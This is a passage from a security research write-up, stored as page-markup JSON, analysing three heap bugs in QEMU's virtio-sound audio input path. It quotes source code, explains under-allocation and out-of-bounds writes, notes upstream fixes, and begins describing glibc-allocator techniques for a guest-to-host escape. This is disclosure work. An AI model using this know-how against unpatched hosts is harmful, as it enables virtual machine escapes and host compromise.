AUD_read",{"type":27,"tag":207,"props":132416,"children":132417},{"style":238},[132418],{"type":33,"value":1343},{"type":27,"tag":207,"props":132420,"children":132421},{"style":220},[132422],{"type":33,"value":43511},{"type":27,"tag":207,"props":132424,"children":132425},{"style":238},[132426],{"type":33,"value":8968},{"type":27,"tag":207,"props":132428,"children":132429},{"style":220},[132430],{"type":33,"value":132431},"voice",{"type":27,"tag":207,"props":132433,"children":132434},{"style":238},[132435],{"type":33,"value":1041},{"type":27,"tag":207,"props":132437,"children":132438},{"style":220},[132439],{"type":33,"value":102715},{"type":27,"tag":207,"props":132441,"children":132442},{"style":238},[132443],{"type":33,"value":1842},{"type":27,"tag":207,"props":132445,"children":132446},{"class":209,"line":7961},[132447,132452,132456,132460,132464,132468,132472,132476],{"type":27,"tag":207,"props":132448,"children":132449},{"style":220},[132450],{"type":33,"value":132451}," buffer",{"type":27,"tag":207,"props":132453,"children":132454},{"style":238},[132455],{"type":33,"value":8968},{"type":27,"tag":207,"props":132457,"children":132458},{"style":220},[132459],{"type":33,"value":9468},{"type":27,"tag":207,"props":132461,"children":132462},{"style":226},[132463],{"type":33,"value":1374},{"type":27,"tag":207,"props":132465,"children":132466},{"style":220},[132467],{"type":33,"value":2660},{"type":27,"tag":207,"props":132469,"children":132470},{"style":238},[132471],{"type":33,"value":8968},{"type":27,"tag":207,"props":132473,"children":132474},{"style":220},[132475],{"type":33,"value":131462},{"type":27,"tag":207,"props":132477,"children":132478},{"style":238},[132479],{"type":33,"value":1842},{"type":27,"tag":207,"props":132481,"children":132482},{"class":209,"line":7969},[132483,132488,132493,132497,132501,132505,132509,132514,132518],{"type":27,"tag":207,"props":132484,"children":132485},{"style":1335},[132486],{"type":33,"value":132487}," MIN",{"type":27,"tag":207,"props":132489,"children":132490},{"style":238},[132491],{"type":33,"value":132492},"(available, (",{"type":27,"tag":207,"props":132494,"children":132495},{"style":220},[132496],{"type":33,"value":43511},{"type":27,"tag":207,"props":132498,"children":132499},{"style":238},[132500],{"type":33,"value":8968},{"type":27,"tag":207,"props":132502,"children":132503},{"style":220},[132504],{"type":33,"value":105497},{"type":27,"tag":207,"props":132506,"children":132507},{"style":238},[132508],{"type":33,"value":1041},{"type":27,"tag":207,"props":132510,"children":132511},{"style":220},[132512],{"type":33,"value":132513},"period_bytes",{"type":27,"tag":207,"props":132515,"children":132516},{"style":226},[132517],{"type":33,"value":544},{"type":27,"tag":207,"props":132519,"children":132520},{"style":4647},[132521],{"type":33,"value":132522}," // [3]\n",{"type":27,"tag":207,"props":132524,"children":132525},{"class":209,"line":7978},[132526,132531,132535,132539],{"type":27,"tag":207,"props":132527,"children":132528},{"style":220},[132529],{"type":33,"value":132530}," buffer",{"type":27,"tag":207,"props":132532,"children":132533},{"style":238},[132534],{"type":33,"value":8968},{"type":27,"tag":207,"props":132536,"children":132537},{"style":220},[132538],{"type":33,"value":131462},{"type":27,"tag":207,"props":132540,"children":132541},{"style":238},[132542],{"type":33,"value":132543},")));\n",{"type":27,"tag":207,"props":132545,"children":132546},{"class":209,"line":7987},[132547,132551,132555,132559],{"type":27,"tag":207,"props":132548,"children":132549},{"style":376},[132550],{"type":33,"value":110727},{"type":27,"tag":207,"props":132552,"children":132553},{"style":238},[132554],{"type":33,"value":686},{"type":27,"tag":207,"props":132556,"children":132557},{"style":226},[132558],{"type":33,"value":27893},{"type":27,"tag":207,"props":132560,"children":132561},{"style":238},[132562],{"type":33,"value":132563},"size) {\n",{"type":27,"tag":207,"props":132565,"children":132566},{"class":209,"line":7996},[132567,132572,132576,132580],{"type":27,"tag":207,"props":132568,"children":132569},{"style":238},[132570],{"type":33,"value":132571}," available ",{"type":27,"tag":207,"props":132573,"children":132574},{"style":226},[132575],{"type":33,"value":10380},{"type":27,"tag":207,"props":132577,"children":132578},{"style":232},[132579],{"type":33,"value":4680},{"type":27,"tag":207,"props":132581,"children":132582},{"style":238},[132583],{"type":33,"value":241},{"type":27,"tag":207,"props":132585,"children":132586},{"class":209,"line":8005},[132587,132591],{"type":27,"tag":207,"props":132588,"children":132589},{"style":376},[132590],{"type":33,"value":132386},{"type":27,"tag":207,"props":132592,"children":132593},{"style":238},[132594],{"type":33,"value":241},{"type":27,"tag":207,"props":132596,"children":132597},{"class":209,"line":8013},[132598],{"type":27,"tag":207,"props":132599,"children":132600},{"style":238},[132601],{"type":33,"value":78304},{"type":27,"tag":207,"props":132603,"children":132604},{"class":209,"line":8021},[132605,132609,132613,132617,132621],{"type":27,"tag":207,"props":132606,"children":132607},{"style":220},[132608],{"type":33,"value":132264},{"type":27,"tag":207,"props":132610,"children":132611},{"style":238},[132612],{"type":33,"value":8968},{"type":27,"tag":207,"props":132614,"children":132615},{"style":220},[132616],{"type":33,"value":131462},{"type":27,"tag":207,"props":132618,"children":132619},{"style":226},[132620],{"type":33,"value":22339},{"type":27,"tag":207,"props":132622,"children":132623},{"style":238},[132624],{"type":33,"value":131804},{"type":27,"tag":207,"props":132626,"children":132627},{"class":209,"line":8029},[132628,132633,132637],{"type":27,"tag":207,"props":132629,"children":132630},{"style":238},[132631],{"type":33,"value":132632}," available ",{"type":27,"tag":207,"props":132634,"children":132635},{"style":226},[132636],{"type":33,"value":111192},{"type":27,"tag":207,"props":132638,"children":132639},{"style":238},[132640],{"type":33,"value":131804},{"type":27,"tag":207,"props":132642,"children":132643},{"class":209,"line":8037},[132644],{"type":27,"tag":207,"props":132645,"children":132646},{"style":238},[132647],{"type":33,"value":132648}," [...]\n",{"type":27,"tag":207,"props":132650,"children":132651},{"class":209,"line":8046},[132652],{"type":27,"tag":207,"props":132653,"children":132654},{"style":238},[132655],{"type":33,"value":66118},{"type":27,"tag":207,"props":132657,"children":132658},{"class":209,"line":8055},[132659],{"type":27,"tag":207,"props":132660,"children":132661},{"style":238},[132662],{"type":33,"value":10637},{"type":27,"tag":207,"props":132664,"children":132665},{"class":209,"line":8064},[132666],{"type":27,"tag":207,"props":132667,"children":132668},{"style":238},[132669],{"type":33,"value":10645},{"type":27,"tag":207,"props":132671,"children":132672},{"class":209,"line":8072},[132673],{"type":27,"tag":207,"props":132674,"children":132675},{"style":238},[132676],{"type":33,"value":451},{"type":27,"tag":36,"props":132678,"children":132679},{},[132680,132681,132686,132687,132693,132695,132701,132703,132708,132709,132714,132716,132721],{"type":33,"value":131584},{"type":27,"tag":84,"props":132682,"children":132684},{"className":132683},[],[132685],{"type":33,"value":131590},{"type":33,"value":1123},{"type":27,"tag":84,"props":132688,"children":132690},{"className":132689},[],[132691],{"type":33,"value":132692},"max_size",{"type":33,"value":132694}," is set to ",{"type":27,"tag":84,"props":132696,"children":132698},{"className":132697},[],[132699],{"type":33,"value":132700},"iov_size(in_sg, in_num)",{"type":33,"value":132702},". Both ",{"type":27,"tag":84,"props":132704,"children":132706},{"className":132705},[],[132707],{"type":33,"value":131315},{"type":33,"value":1131},{"type":27,"tag":84,"props":132710,"children":132712},{"className":132711},[],[132713],{"type":33,"value":131332},{"type":33,"value":132715}," are the same guest-controlled fields from ",{"type":27,"tag":84,"props":132717,"children":132719},{"className":132718},[],[132720],{"type":33,"value":130967},{"type":33,"value":1041},{"type":27,"tag":36,"props":132723,"children":132724},{},[132725,132727,132732,132734,132740,132742,132748,132750,132756],{"type":33,"value":132726},"Later, at ",{"type":27,"tag":84,"props":132728,"children":132730},{"className":132729},[],[132731],{"type":33,"value":131625},{"type":33,"value":132733},", the code checks whether ",{"type":27,"tag":84,"props":132735,"children":132737},{"className":132736},[],[132738],{"type":33,"value":132739},"buffer->size >= max_size",{"type":33,"value":132741},". In the RX path, ",{"type":27,"tag":84,"props":132743,"children":132745},{"className":132744},[],[132746],{"type":33,"value":132747},"buffer->size",{"type":33,"value":132749}," tracks how many bytes have been written into ",{"type":27,"tag":84,"props":132751,"children":132753},{"className":132752},[],[132754],{"type":33,"value":132755},"buffer->data",{"type":33,"value":132757},", not the size of the allocation itself. This check is therefore intended to stop reading once the buffer is full.",{"type":27,"tag":36,"props":132759,"children":132760},{},[132761,132763,132768,132770,132776,132778,132783,132785,132791],{"type":33,"value":132762},"However, this does not match the allocation logic in ",{"type":27,"tag":84,"props":132764,"children":132766},{"className":132765},[],[132767],{"type":33,"value":130967},{"type":33,"value":132769},", which used: ",{"type":27,"tag":84,"props":132771,"children":132773},{"className":132772},[],[132774],{"type":33,"value":132775},"size = iov_size(elem->in_sg, elem->in_num) - sizeof(virtio_snd_pcm_status);",{"type":33,"value":132777},". In other words, the allocation subtracts ",{"type":27,"tag":84,"props":132779,"children":132781},{"className":132780},[],[132782],{"type":33,"value":131691},{"type":33,"value":132784},", but the later bound in ",{"type":27,"tag":84,"props":132786,"children":132788},{"className":132787},[],[132789],{"type":33,"value":132790},"virtio_snd_pcm_in_cb",{"type":33,"value":132792}," does not. That mismatch gives us a second bug: an 8-byte OOB write.",{"type":27,"tag":36,"props":132794,"children":132795},{},[132796,132798,132803,132805,132811,132813,132819,132821,132826,132828,132834,132836,132842,132844,132849,132851,132856],{"type":33,"value":132797},"Finally, at ",{"type":27,"tag":84,"props":132799,"children":132801},{"className":132800},[],[132802],{"type":33,"value":131649},{"type":33,"value":132804},", the code calls ",{"type":27,"tag":84,"props":132806,"children":132808},{"className":132807},[],[132809],{"type":33,"value":132810},"AUD_read",{"type":33,"value":132812}," with the following limit:\n",{"type":27,"tag":84,"props":132814,"children":132816},{"className":132815},[],[132817],{"type":33,"value":132818},"MIN(available, stream->params.period_bytes - buffer->size)",{"type":33,"value":132820},". Notice how this bound does not take ",{"type":27,"tag":84,"props":132822,"children":132824},{"className":132823},[],[132825],{"type":33,"value":132692},{"type":33,"value":132827}," into account at all. That means if ",{"type":27,"tag":84,"props":132829,"children":132831},{"className":132830},[],[132832],{"type":33,"value":132833},"available",{"type":33,"value":132835}," is larger than the allocated buffer, and ",{"type":27,"tag":84,"props":132837,"children":132839},{"className":132838},[],[132840],{"type":33,"value":132841},"stream->params.period_bytes",{"type":33,"value":132843}," is also larger than the allocated buffer, ",{"type":27,"tag":84,"props":132845,"children":132847},{"className":132846},[],[132848],{"type":33,"value":132810},{"type":33,"value":132850}," will write past the end of ",{"type":27,"tag":84,"props":132852,"children":132854},{"className":132853},[],[132855],{"type":33,"value":132755},{"type":33,"value":132857}," - the third, and final, bug we found.",{"type":27,"tag":36,"props":132859,"children":132860},{},[132861,132863,132868,132870,132876],{"type":33,"value":132862},"Looking further at the code, we can see that ",{"type":27,"tag":84,"props":132864,"children":132866},{"className":132865},[],[132867],{"type":33,"value":132841},{"type":33,"value":132869}," is fully guest-controlled by issuing a ",{"type":27,"tag":84,"props":132871,"children":132873},{"className":132872},[],[132874],{"type":33,"value":132875},"VIRTIO_SND_R_PCM_SET_PARAMS",{"type":33,"value":132877}," request:",{"type":27,"tag":101,"props":132879,"children":132881},{"code":132880,"language":10435,"meta":7,"className":23789,"style":7},"static\nuint32_t virtio_snd_set_pcm_params(VirtIOSound *s,\n uint32_t stream_id,\n virtio_snd_pcm_set_params *params)\n{\n virtio_snd_pcm_set_params *st_params;\n\n [...]\n\n st_params = virtio_snd_pcm_get_params(s, stream_id);\n\n [...]\n\n st_params->buffer_bytes = le32_to_cpu(params->buffer_bytes);\n st_params->period_bytes = le32_to_cpu(params->period_bytes);\n st_params->features = le32_to_cpu(params->features);\n /* the following are uint8_t, so there's no need to bswap the values. */\n st_params->channels = params->channels;\n st_params->format = params->format;\n st_params->rate = params->rate;\n\n return cpu_to_le32(VIRTIO_SND_S_OK);\n}\n",[132882],{"type":27,"tag":84,"props":132883,"children":132884},{"__ignoreMap":7},[132885,132893,132922,132939,132959,132966,132983,132990,132997,133004,133026,133033,133040,133047,133093,133136,133180,133188,133225,133261,133297,133304,133321],{"type":27,"tag":207,"props":132886,"children":132887},{"class":209,"line":210},[132888],{"type":27,"tag":207,"props":132889,"children":132890},{"style":214},[132891],{"type":33,"value":132892},"static\n",{"type":27,"tag":207,"props":132894,"children":132895},{"class":209,"line":244},[132896,132900,132905,132910,132914,132918],{"type":27,"tag":207,"props":132897,"children":132898},{"style":214},[132899],{"type":33,"value":65166},{"type":27,"tag":207,"props":132901,"children":132902},{"style":1335},[132903],{"type":33,"value":132904}," virtio_snd_set_pcm_params",{"type":27,"tag":207,"props":132906,"children":132907},{"style":238},[132908],{"type":33,"value":132909},"(VirtIOSound ",{"type":27,"tag":207,"props":132911,"children":132912},{"style":226},[132913],{"type":33,"value":9286},{"type":27,"tag":207,"props":132915,"children":132916},{"style":220},[132917],{"type":33,"value":17929},{"type":27,"tag":207,"props":132919,"children":132920},{"style":238},[132921],{"type":33,"value":1842},{"type":27,"tag":207,"props":132923,"children":132924},{"class":209,"line":270},[132925,132930,132935],{"type":27,"tag":207,"props":132926,"children":132927},{"style":214},[132928],{"type":33,"value":132929}," uint32_t",{"type":27,"tag":207,"props":132931,"children":132932},{"style":220},[132933],{"type":33,"value":132934}," stream_id",{"type":27,"tag":207,"props":132936,"children":132937},{"style":238},[132938],{"type":33,"value":1842},{"type":27,"tag":207,"props":132940,"children":132941},{"class":209,"line":296},[132942,132947,132951,132955],{"type":27,"tag":207,"props":132943,"children":132944},{"style":238},[132945],{"type":33,"value":132946}," virtio_snd_pcm_set_params ",{"type":27,"tag":207,"props":132948,"children":132949},{"style":226},[132950],{"type":33,"value":9286},{"type":27,"tag":207,"props":132952,"children":132953},{"style":220},[132954],{"type":33,"value":105497},{"type":27,"tag":207,"props":132956,"children":132957},{"style":238},[132958],{"type":33,"value":10449},{"type":27,"tag":207,"props":132960,"children":132961},{"class":209,"line":445},[132962],{"type":27,"tag":207,"props":132963,"children":132964},{"style":238},[132965],{"type":33,"value":18158},{"type":27,"tag":207,"props":132967,"children":132968},{"class":209,"line":867},[132969,132974,132978],{"type":27,"tag":207,"props":132970,"children":132971},{"style":238},[132972],{"type":33,"value":132973}," virtio_snd_pcm_set_params ",{"type":27,"tag":207,"props":132975,"children":132976},{"style":226},[132977],{"type":33,"value":9286},{"type":27,"tag":207,"props":132979,"children":132980},{"style":238},[132981],{"type":33,"value":132982},"st_params;\n",{"type":27,"tag":207,"props":132984,"children":132985},{"class":209,"line":892},[132986],{"type":27,"tag":207,"props":132987,"children":132988},{"emptyLinePlaceholder":19},[132989],{"type":33,"value":2062},{"type":27,"tag":207,"props":132991,"children":132992},{"class":209,"line":1475},[132993],{"type":27,"tag":207,"props":132994,"children":132995},{"style":238},[132996],{"type":33,"value":112006},{"type":27,"tag":207,"props":132998,"children":132999},{"class":209,"line":2065},[133000],{"type":27,"tag":207,"props":133001,"children":133002},{"emptyLinePlaceholder":19},[133003],{"type":33,"value":2062},{"type":27,"tag":207,"props":133005,"children":133006},{"class":209,"line":2092},[133007,133012,133016,133021],{"type":27,"tag":207,"props":133008,"children":133009},{"style":238},[133010],{"type":33,"value":133011}," st_params ",{"type":27,"tag":207,"props":133013,"children":133014},{"style":226},[133015],{"type":33,"value":10380},{"type":27,"tag":207,"props":133017,"children":133018},{"style":1335},[133019],{"type":33,"value":133020}," virtio_snd_pcm_get_params",{"type":27,"tag":207,"props":133022,"children":133023},{"style":238},[133024],{"type":33,"value":133025},"(s, stream_id);\n",{"type":27,"tag":207,"props":133027,"children":133028},{"class":209,"line":2130},[133029],{"type":27,"tag":207,"props":133030,"children":133031},{"emptyLinePlaceholder":19},[133032],{"type":33,"value":2062},{"type":27,"tag":207,"props":133034,"children":133035},{"class":209,"line":2168},[133036],{"type":27,"tag":207,"props":133037,"children":133038},{"style":238},[133039],{"type":33,"value":112006},{"type":27,"tag":207,"props":133041,"children":133042},{"class":209,"line":4095},[133043],{"type":27,"tag":207,"props":133044,"children":133045},{"emptyLinePlaceholder":19},[133046],{"type":33,"value":2062},{"type":27,"tag":207,"props":133048,"children":133049},{"class":209,"line":4103},[133050,133055,133059,133064,133068,133073,133077,133081,133085,133089],{"type":27,"tag":207,"props":133051,"children":133052},{"style":220},[133053],{"type":33,"value":133054}," st_params",{"type":27,"tag":207,"props":133056,"children":133057},{"style":238},[133058],{"type":33,"value":8968},{"type":27,"tag":207,"props":133060,"children":133061},{"style":220},[133062],{"type":33,"value":133063},"buffer_bytes",{"type":27,"tag":207,"props":133065,"children":133066},{"style":226},[133067],{"type":33,"value":229},{"type":27,"tag":207,"props":133069,"children":133070},{"style":1335},[133071],{"type":33,"value":133072}," le32_to_cpu",{"type":27,"tag":207,"props":133074,"children":133075},{"style":238},[133076],{"type":33,"value":1343},{"type":27,"tag":207,"props":133078,"children":133079},{"style":220},[133080],{"type":33,"value":105497},{"type":27,"tag":207,"props":133082,"children":133083},{"style":238},[133084],{"type":33,"value":8968},{"type":27,"tag":207,"props":133086,"children":133087},{"style":220},[133088],{"type":33,"value":133063},{"type":27,"tag":207,"props":133090,"children":133091},{"style":238},[133092],{"type":33,"value":1455},{"type":27,"tag":207,"props":133094,"children":133095},{"class":209,"line":4154},[133096,133100,133104,133108,133112,133116,133120,133124,133128,133132],{"type":27,"tag":207,"props":133097,"children":133098},{"style":220},[133099],{"type":33,"value":133054},{"type":27,"tag":207,"props":133101,"children":133102},{"style":238},[133103],{"type":33,"value":8968},{"type":27,"tag":207,"props":133105,"children":133106},{"style":220},[133107],{"type":33,"value":132513},{"type":27,"tag":207,"props":133109,"children":133110},{"style":226},[133111],{"type":33,"value":229},{"type":27,"tag":207,"props":133113,"children":133114},{"style":1335},[133115],{"type":33,"value":133072},{"type":27,"tag":207,"props":133117,"children":133118},{"style":238},[133119],{"type":33,"value":1343},{"type":27,"tag":207,"props":133121,"children":133122},{"style":220},[133123],{"type":33,"value":105497},{"type":27,"tag":207,"props":133125,"children":133126},{"style":238},[133127],{"type":33,"value":8968},{"type":27,"tag":207,"props":133129,"children":133130},{"style":220},[133131],{"type":33,"value":132513},{"type":27,"tag":207,"props":133133,"children":133134},{"style":238},[133135],{"type":33,"value":1455},{"type":27,"tag":207,"props":133137,"children":133138},{"class":209,"line":4203},[133139,133143,133147,133152,133156,133160,133164,133168,133172,133176],{"type":27,"tag":207,"props":133140,"children":133141},{"style":220},[133142],{"type":33,"value":133054},{"type":27,"tag":207,"props":133144,"children":133145},{"style":238},[133146],{"type":33,"value":8968},{"type":27,"tag":207,"props":133148,"children":133149},{"style":220},[133150],{"type":33,"value":133151},"features",{"type":27,"tag":207,"props":133153,"children":133154},{"style":226},[133155],{"type":33,"value":229},{"type":27,"tag":207,"props":133157,"children":133158},{"style":1335},[133159],{"type":33,"value":133072},{"type":27,"tag":207,"props":133161,"children":133162},{"style":238},[133163],{"type":33,"value":1343},{"type":27,"tag":207,"props":133165,"children":133166},{"style":220},[133167],{"type":33,"value":105497},{"type":27,"tag":207,"props":133169,"children":133170},{"style":238},[133171],{"type":33,"value":8968},{"type":27,"tag":207,"props":133173,"children":133174},{"style":220},[133175],{"type":33,"value":133151},{"type":27,"tag":207,"props":133177,"children":133178},{"style":238},[133179],{"type":33,"value":1455},{"type":27,"tag":207,"props":133181,"children":133182},{"class":209,"line":4249},[133183],{"type":27,"tag":207,"props":133184,"children":133185},{"style":4647},[133186],{"type":33,"value":133187}," /* the following are uint8_t, so there's no need to bswap the values. */\n",{"type":27,"tag":207,"props":133189,"children":133190},{"class":209,"line":4290},[133191,133195,133199,133204,133208,133213,133217,133221],{"type":27,"tag":207,"props":133192,"children":133193},{"style":220},[133194],{"type":33,"value":133054},{"type":27,"tag":207,"props":133196,"children":133197},{"style":238},[133198],{"type":33,"value":8968},{"type":27,"tag":207,"props":133200,"children":133201},{"style":220},[133202],{"type":33,"value":133203},"channels",{"type":27,"tag":207,"props":133205,"children":133206},{"style":226},[133207],{"type":33,"value":229},{"type":27,"tag":207,"props":133209,"children":133210},{"style":220},[133211],{"type":33,"value":133212}," params",{"type":27,"tag":207,"props":133214,"children":133215},{"style":238},[133216],{"type":33,"value":8968},{"type":27,"tag":207,"props":133218,"children":133219},{"style":220},[133220],{"type":33,"value":133203},{"type":27,"tag":207,"props":133222,"children":133223},{"style":238},[133224],{"type":33,"value":241},{"type":27,"tag":207,"props":133226,"children":133227},{"class":209,"line":4304},[133228,133232,133236,133241,133245,133249,133253,133257],{"type":27,"tag":207,"props":133229,"children":133230},{"style":220},[133231],{"type":33,"value":133054},{"type":27,"tag":207,"props":133233,"children":133234},{"style":238},[133235],{"type":33,"value":8968},{"type":27,"tag":207,"props":133237,"children":133238},{"style":220},[133239],{"type":33,"value":133240},"format",{"type":27,"tag":207,"props":133242,"children":133243},{"style":226},[133244],{"type":33,"value":229},{"type":27,"tag":207,"props":133246,"children":133247},{"style":220},[133248],{"type":33,"value":133212},{"type":27,"tag":207,"props":133250,"children":133251},{"style":238},[133252],{"type":33,"value":8968},{"type":27,"tag":207,"props":133254,"children":133255},{"style":220},[133256],{"type":33,"value":133240},{"type":27,"tag":207,"props":133258,"children":133259},{"style":238},[133260],{"type":33,"value":241},{"type":27,"tag":207,"props":133262,"children":133263},{"class":209,"line":5466},[133264,133268,133272,133277,133281,133285,133289,133293],{"type":27,"tag":207,"props":133265,"children":133266},{"style":220},[133267],{"type":33,"value":133054},{"type":27,"tag":207,"props":133269,"children":133270},{"style":238},[133271],{"type":33,"value":8968},{"type":27,"tag":207,"props":133273,"children":133274},{"style":220},[133275],{"type":33,"value":133276},"rate",{"type":27,"tag":207,"props":133278,"children":133279},{"style":226},[133280],{"type":33,"value":229},{"type":27,"tag":207,"props":133282,"children":133283},{"style":220},[133284],{"type":33,"value":133212},{"type":27,"tag":207,"props":133286,"children":133287},{"style":238},[133288],{"type":33,"value":8968},{"type":27,"tag":207,"props":133290,"children":133291},{"style":220},[133292],{"type":33,"value":133276},{"type":27,"tag":207,"props":133294,"children":133295},{"style":238},[133296],{"type":33,"value":241},{"type":27,"tag":207,"props":133298,"children":133299},{"class":209,"line":5530},[133300],{"type":27,"tag":207,"props":133301,"children":133302},{"emptyLinePlaceholder":19},[133303],{"type":33,"value":2062},{"type":27,"tag":207,"props":133305,"children":133306},{"class":209,"line":7900},[133307,133311,133316],{"type":27,"tag":207,"props":133308,"children":133309},{"style":376},[133310],{"type":33,"value":8986},{"type":27,"tag":207,"props":133312,"children":133313},{"style":1335},[133314],{"type":33,"value":133315}," cpu_to_le32",{"type":27,"tag":207,"props":133317,"children":133318},{"style":238},[133319],{"type":33,"value":133320},"(VIRTIO_SND_S_OK);\n",{"type":27,"tag":207,"props":133322,"children":133323},{"class":209,"line":7909},[133324],{"type":27,"tag":207,"props":133325,"children":133326},{"style":238},[133327],{"type":33,"value":451},{"type":27,"tag":36,"props":133329,"children":133330},{},[133331,133333,133338,133340,133346,133348,133353,133355,133360,133362,133368,133369,133374],{"type":33,"value":133332},"Among the guest-controlled PCM parameters, format matters later for exploit reliability. For 8-bit PCM, QEMU accepts both unsigned (",{"type":27,"tag":84,"props":133334,"children":133336},{"className":133335},[],[133337],{"type":33,"value":10709},{"type":33,"value":133339},") and signed (",{"type":27,"tag":84,"props":133341,"children":133343},{"className":133342},[],[133344],{"type":33,"value":133345},"s8",{"type":33,"value":133347},") samples. They encode the same waveform differently - silence is ",{"type":27,"tag":84,"props":133349,"children":133351},{"className":133350},[],[133352],{"type":33,"value":36701},{"type":33,"value":133354}," in ",{"type":27,"tag":84,"props":133356,"children":133358},{"className":133357},[],[133359],{"type":33,"value":10709},{"type":33,"value":133361},", but ",{"type":27,"tag":84,"props":133363,"children":133365},{"className":133364},[],[133366],{"type":33,"value":133367},"0x00",{"type":33,"value":133354},{"type":27,"tag":84,"props":133370,"children":133372},{"className":133371},[],[133373],{"type":33,"value":133345},{"type":33,"value":1041},{"type":27,"tag":26063,"props":133376,"children":133377},{},[],{"type":27,"tag":36,"props":133379,"children":133380},{},[133381],{"type":33,"value":133382},"To summarize:",{"type":27,"tag":12719,"props":133384,"children":133385},{},[133386,133405,133423],{"type":27,"tag":1232,"props":133387,"children":133388},{},[133389,133391,133396,133398,133403],{"type":33,"value":133390},"an integer underflow in the ",{"type":27,"tag":84,"props":133392,"children":133394},{"className":133393},[],[133395],{"type":33,"value":131462},{"type":33,"value":133397}," calculation in ",{"type":27,"tag":84,"props":133399,"children":133401},{"className":133400},[],[133402],{"type":33,"value":130967},{"type":33,"value":133404},", resulting in an 8-byte (or less) under-allocation",{"type":27,"tag":1232,"props":133406,"children":133407},{},[133408,133410,133415,133416,133421],{"type":33,"value":133409},"a mismatch in the ",{"type":27,"tag":84,"props":133411,"children":133413},{"className":133412},[],[133414],{"type":33,"value":132692},{"type":33,"value":133397},{"type":27,"tag":84,"props":133417,"children":133419},{"className":133418},[],[133420],{"type":33,"value":132790},{"type":33,"value":133422},", leading to at most 8-byte OOB write",{"type":27,"tag":1232,"props":133424,"children":133425},{},[133426,133428,133433,133435,133440,133442,133447],{"type":33,"value":133427},"a missing bound in the ",{"type":27,"tag":84,"props":133429,"children":133431},{"className":133430},[],[133432],{"type":33,"value":131462},{"type":33,"value":133434}," passed to ",{"type":27,"tag":84,"props":133436,"children":133438},{"className":133437},[],[133439],{"type":33,"value":132810},{"type":33,"value":133441},", which does not take the actual buffer allocation size into account and can therefore lead to an OOB write of an arbitrary length, up to ",{"type":27,"tag":84,"props":133443,"children":133445},{"className":133444},[],[133446],{"type":33,"value":132833},{"type":33,"value":89512},{"type":27,"tag":36,"props":133449,"children":133450},{},[133451,133453,133458,133460,133465,133467,133473],{"type":33,"value":133452},"In our exploit, we focus on the third bug because it provides the largest overflow and therefore the most useful primitive. In practice, the actual write is still bounded by ",{"type":27,"tag":84,"props":133454,"children":133456},{"className":133455},[],[133457],{"type":33,"value":132833},{"type":33,"value":133459},", but in our setup with the ALSA backend, ",{"type":27,"tag":84,"props":133461,"children":133463},{"className":133462},[],[133464],{"type":33,"value":132833},{"type":33,"value":133466}," was consistently around ",{"type":27,"tag":84,"props":133468,"children":133470},{"className":133469},[],[133471],{"type":33,"value":133472},"4096",{"type":33,"value":1041},{"type":27,"tag":36,"props":133475,"children":133476},{},[133477,133479,133486,133487,133494],{"type":33,"value":133478},"It is also worth noting that the timing here was particularly unlucky - these bugs had been present in QEMU for over two years, but they were fixed (",{"type":27,"tag":47,"props":133480,"children":133483},{"href":133481,"rel":133482},"https://github.com/qemu/qemu/commit/bcb53328aa70023f1405fade4e253e7f77567261",[51],[133484],{"type":33,"value":133485},"commit 1",{"type":33,"value":1123},{"type":27,"tag":47,"props":133488,"children":133491},{"href":133489,"rel":133490},"https://github.com/qemu/qemu/commit/7994203bb1b83a6604f3ab00fe9598909bb66164",[51],[133492],{"type":33,"value":133493},"commit 2",{"type":33,"value":133495},") in the very same week that we independently found them while manually reviewing the code.",{"type":27,"tag":28,"props":133497,"children":133498},{"id":107323},[133499],{"type":33,"value":107326},{"type":27,"tag":36,"props":133501,"children":133502},{},[133503],{"type":33,"value":133504},"Each of these bugs is in the audio input path. Since that audio input comes from the host side, the bytes written out of bounds are not controlled by the guest and, from the exploit perspective, can be treated as effectively random.",{"type":27,"tag":36,"props":133506,"children":133507},{},[133508],{"type":33,"value":133509},"This gives an interesting challenge: how do you exploit an out-of-bounds write when you do not control the data being written?",{"type":27,"tag":58,"props":133511,"children":133513},{"id":133512},"achieving-a-better-primitive",[133514],{"type":33,"value":133515},"Achieving a Better Primitive",{"type":27,"tag":36,"props":133517,"children":133518},{},[133519],{"type":33,"value":133520},"The first idea that comes to mind is to target some kind of size or offset field. The goal is to make that field as small as possible initially, trigger the overflow, and rely on the corrupted bytes being larger than the original value. Such scenario would transform a weak primitive into a much more useful one, giving us a better starting point for the rest of the exploit.",{"type":27,"tag":36,"props":133522,"children":133523},{},[133524],{"type":33,"value":133525},"However, after searching QEMU for such objects we didn't find a suitable target. The main problem was that, in most cases, the field we wanted to corrupt was preceded by one or more pointers. That would have been acceptable if those pointers were unused, but in every candidate object we examined they were still live. As a result, the heap overflow would corrupt them with effectively random bytes, causing an invalid dereference and crashing QEMU before we could achieve our desired guest-to-host escape.",{"type":27,"tag":36,"props":133527,"children":133528},{},[133529],{"type":33,"value":133530},"At that point, we turned our attention to the glibc allocator. This is usually not the first choice in such targets - allocator techniques are often more version-specific and less portable than program-specific primitives (for example, type confusion on known object layouts). So allocator attacks are often a fallback once object-level paths are exhausted.",{"type":27,"tag":26163,"props":133532,"children":133534},{"id":133533},"glibc-allocator",[133535],{"type":33,"value":133536},"Glibc Allocator",{"type":27,"tag":36,"props":133538,"children":133539},{},[133540,133542,133549],{"type":33,"value":133541},"The glibc allocator has already been studied and documented extensively, so we will only cover the basics relevant to this exploit. A good resource for both current and older attack techniques is ",{"type":27,"tag":47,"props":133543,"children":133546},{"href":133544,"rel":133545},"https://github.com/shellphish/how2heap",[51],[133547],{"type":33,"value":133548},"how2heap",{"type":33,"value":1041},{"type":27,"tag":44596,"props":133551,"children":133553},{"id":133552},"chunk-layout-and-bins",[133554],{"type":33,"value":133555},"Chunk Layout and Bins",{"type":27,"tag":36,"props":133557,"children":133558},{},[133559],{"type":33,"value":133560},"A chunk looks like this:",{"type":27,"tag":101,"props":133562,"children":133564},{"code":133563}," +0x0 +0x8\n +-------------+-------------+\n | prev_size | size |\n +---------------------------+\n+0x10 | 41 41 41 41 41 41 41 41 |\n | |\n | 41 41 41 41 41 41 41 41 |\n | |\n | . . . |\n",[133565],{"type":27,"tag":84,"props":133566,"children":133567},{"__ignoreMap":7},[133568],{"type":33,"value":133563},{"type":27,"tag":36,"props":133570,"children":133571},{},[133572,133574,133580,133582,133588,133589,133594,133595,133601,133603,133608,133610,133615,133617,133623,133624,133630,133632,133638],{"type":33,"value":133573},"The first 16 bytes form the chunk header. It consists of the ",{"type":27,"tag":84,"props":133575,"children":133577},{"className":133576},[],[133578],{"type":33,"value":133579},"prev_size",{"type":33,"value":133581}," field at offset 